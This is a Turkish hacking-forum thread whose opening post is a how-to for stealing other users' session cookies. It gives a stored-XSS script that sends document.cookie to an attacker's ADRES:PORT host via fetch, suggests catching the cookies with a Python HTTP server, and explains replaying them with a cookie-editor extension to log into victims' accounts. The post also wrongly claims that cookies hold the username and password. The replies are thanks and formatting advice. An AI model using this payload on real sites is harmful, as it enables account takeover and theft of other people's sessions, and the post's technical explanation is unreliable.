Session Hijacking(Cookie Saldırıları)

d7ny4D0ns7nT2rs1n2 · 19 Eki 2023

Herkes en az bir kez karşılaşmıştır bu cookilerle sağda solda biryerlerde çıkar insanı rahatsız ettirir ve zorla kendini kabul ettirir

Cookie örneği vericek olursa şöyle varsayalım: Facebook'a giriş yaptınız çıktınız ve tekrar girdiğiniz, girdiğinizde sizden ne şifre nede kullanıcı adı istedi bunun sebebi tarayıcımıza kaydedilen cookie'dir kullanıcı adı ve şifren cookie'de durur ve sen bu siteye istek attığında cookie'lerde istekle beraber gider.
Eğer başka birinin cookie bilgisini alırsak o kişi üzerinden işlem yapabiliriz.

Başka bir örnek verelim bir forum sitesine giriş yaptınız ve post paylaştınız. Bu şekilde bu posta bir tuzak yerleştirebiliriz. Bunun için bir script kullanıcağız, scriptimiz bu

Kod:

<script> fetch("http://ADRES:PORT/"+document.cookie) </script>

bu scripti postun başlığına, açıklamasına yerleştirebiliriz. Bunları yaptıktan sonra posta tıklayan kişilerin cookie bilgileri bizim web sunucumuza gelicektir yani

Kod:

ADRES:PORT

yazan kısma.

Kod:

ADRES:PORT

kısmında ne yapıcağınızı şaşırdıysanız `python -m http.server 80` komutunu kullanabilirsiniz. Bu komut bulunduğunuz dizinin web halidir. Ee bizim cookie'ler nerede dicek olursanız cookie'ler terminal ekranına düşücektir.

Bu cookie'leri kullanarak hesaplara giriş yapmak için F12 tuşuna basıp token kısmından tokeni değişebilirsiniz. Cookie Editor gibi eklentilerde kullanılabilir.

AimPluqqed · 19 Eki 2023

Elinize sağlık.

mr3dx · 19 Eki 2023

Eline sağlık güzel konu

d7ny4D0ns7nT2rs1n2 · 19 Eki 2023

AimPluqqed' Alıntı:
Elinize sağlık.

Crazy Headache' Alıntı:
Eline sağlık güzel konu

Eyvallah

ruquk · 19 Eki 2023

anlamadım bu thtnin forumunda oluyormu

OBT is HeRYerDe · 19 Eki 2023

Merhaba;
Güzel İçerik Fakat Daha Çok Detay Vermeye Çalış Yazını Renklendir Ve Resimler İle Süsle Okurlar Bunları Önemser, Eline Sağlık.

I AM EAC0D3Rx · 20 Eki 2023

Elinize sağlık

'Anka · 20 Eki 2023

Merhaba,

"Session Hijacking ve Cookie Saldırıları" başlığı altında konu açman, önemli bir konuyu gündeme getirmeni takdir ediyorum. Bu tür güvenlik açıkları hakkında bilgi paylaşımı yaparak diğer üyeleri bilinçlendirmek, siber güvenlik konusunda daha güçlü bir topluluk oluşturmamıza katkı sağlar diye düşünüyorum. Ek olarak, konuya görsel eklemen ve renkli bir anlatımla desteklenmiş daha iyi bir paylaşım yapmanıza yardımcı olabilir. Görseller, konuyu daha iyi anlatmana ve diğer üyelerin daha kolay takip etmelerini sağlamana yardımcı olur. Tekrardan teşekkür ederiz ve siber güvenlik alanında bilgi paylaşımına devam ettiğin için takdirimi sunarım devamını dilerim.

Saygılarımla,
'Anka

GZA · 26 Eki 2023

elinize saglik

d7ny4D0ns7nT2rs1n2 · 27 Eki 2023

GZA' Alıntı:
elinize saglik

'Anka' Alıntı:
Merhaba,

"Session Hijacking ve Cookie Saldırıları" başlığı altında konu açman, önemli bir konuyu gündeme getirmeni takdir ediyorum. Bu tür güvenlik açıkları hakkında bilgi paylaşımı yaparak diğer üyeleri bilinçlendirmek, siber güvenlik konusunda daha güçlü bir topluluk oluşturmamıza katkı sağlar diye düşünüyorum. Ek olarak, konuya görsel eklemen ve renkli bir anlatımla desteklenmiş daha iyi bir paylaşım yapmanıza yardımcı olabilir. Görseller, konuyu daha iyi anlatmana ve diğer üyelerin daha kolay takip etmelerini sağlamana yardımcı olur. Tekrardan teşekkür ederiz ve siber güvenlik alanında bilgi paylaşımına devam ettiğin için takdirimi sunarım devamını dilerim.

Saygılarımla,
'Anka

404Qea' Alıntı:
Elinize sağlık

OBT is HeRYerDe' Alıntı:
Merhaba;
Güzel İçerik Fakat Daha Çok Detay Vermeye Çalış Yazını Renklendir Ve Resimler İle Süsle Okurlar Bunları Önemser, Eline Sağlık.

Eyvallah

Session Hijacking(Cookie Saldırıları)

d7ny4D0ns7nT2rs1n2

Üye

AimPluqqed

Üye

mr3dx

Üye

d7ny4D0ns7nT2rs1n2

Üye

ruquk

Yeni üye

OBT is HeRYerDe

Anka Team

I AM EAC0D3Rx

Uzman üye

'Anka

Basın&Medya Ekibi Kıdemli

GZA

Üye

d7ny4D0ns7nT2rs1n2

Üye

Sosyal medya sayfalarımız